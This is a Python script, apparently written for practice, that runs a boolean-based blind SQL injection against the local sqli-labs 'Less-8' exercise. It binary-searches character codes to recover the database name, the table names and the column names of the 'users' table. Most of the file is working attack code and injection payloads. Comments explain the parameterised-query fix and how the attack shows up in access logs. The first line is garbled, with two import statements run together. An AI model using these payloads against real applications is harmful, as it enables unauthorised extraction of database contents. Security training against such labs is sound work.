from msilib.schema import tablesimport requests
from setuptools.package_index import user_agent  # unused below (IDE auto-import); the msilib import above is unused too and only exists on Windows

# Boolean-based blind SQL injection walkthrough against the sqli-labs "Less-8"
# exercise served from the local URL hard-coded in __main__.  Each request sends
# a crafted `id` query parameter and the only signal that comes back is whether
# the page still contains _TRUE_MARKER; a binary search on the ASCII value of
# one character per request rebuilds the target string.
#
# Defender's view: the application-side fix is a parameterised query for `id`
# together with a response that does not differ between true and false
# conditions.  In access logs this tool is easy to spot: a burst of requests
# whose `id` value contains `ascii(substr(` / `information_schema` with a
# numeric tail that changes on every request.

# Page text the lab emits when the injected condition is true.
_TRUE_MARKER = "You are in..........."

# ASCII search window 32..127.  A position past the end of the target string
# drives the search down to 32 (presumably because MySQL's ascii('') is 0, so
# no "> guess" test ever succeeds); the callers use 32 as their stop condition.
_ASCII_LO = 32
_ASCII_HI = 128


def _condition_holds(url, payload):
    """Send *payload* as the `id` parameter of *url* and report whether the
    response body contains the true-branch marker."""
    response = requests.get(url, params={"id": payload})
    return _TRUE_MARKER in response.text


def _search_char(url, template, *prefix):
    """Binary-search the ASCII code of one character.

    *template* is a %-format string whose last `%d` receives the current guess;
    *prefix* holds the format arguments that precede it.  Returns the lower
    bound once the search has converged, which is _ASCII_LO when the probed
    position is past the end of the string.
    """
    lo, hi = _ASCII_LO, _ASCII_HI
    while lo < hi:
        guess = (lo + hi) // 2
        if _condition_holds(url, template % (prefix + (guess,))):
            lo = guess + 1
        else:
            hi = guess
    return lo


def getDatabase(url):
    """Recover the current database name (at most 19 characters, the bound of
    the position loop) and print it."""
    recovered = ""
    for position in range(1, 20):
        code = _search_char(
            url, "1' and ascii(substr(database(),%d,1)) > %d-- ", position
        )
        if code == _ASCII_LO:
            break
        recovered += chr(code)
    print(recovered)


def getTable(url):
    """Recover the comma-joined table names of the `security` schema (at most
    49 characters) and print them."""
    recovered = ""
    for position in range(1, 50):
        code = _search_char(
            url,
            "1' and ascii(SUBSTR((SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = 'security'), %d, 1)) > %d-- ",
            position,
        )
        if code == _ASCII_LO:
            break
        recovered += chr(code)
    print(recovered)


def getColumns(url, table_name):
    """Recover the comma-joined column names of *table_name* (at most 99
    characters) and print them.  *table_name* is spliced into the query text
    unescaped, exactly as in the original."""
    recovered = ""
    for position in range(1, 100):
        code = _search_char(
            url,
            "1' AND ascii(substr((SELECT GROUP_CONCAT(COLUMN_NAME) FROM information_schema.columns WHERE TABLE_NAME='%s'), %d, 1)) > %d-- ",
            table_name,
            position,
        )
        if code == _ASCII_LO:
            break
        recovered += chr(code)
    print(recovered)


if __name__ == '__main__':
    # Local training-lab instance; nothing below is reachable without it.
    url = 'http://127.0.0.1/sqli-labs-php7-master/Less-8/index.php'
    tablesname = 'users'
    column_name = 'username'  # assigned but never used in this file
    row = "id=2"              # assigned but never used in this file
    getDatabase(url)
    getTable(url)
    getColumns(url, tablesname)
函数getDatabase:获取数据库名字
函数getTable:获取数据库的表名
函数getColumns:获取数据库的列名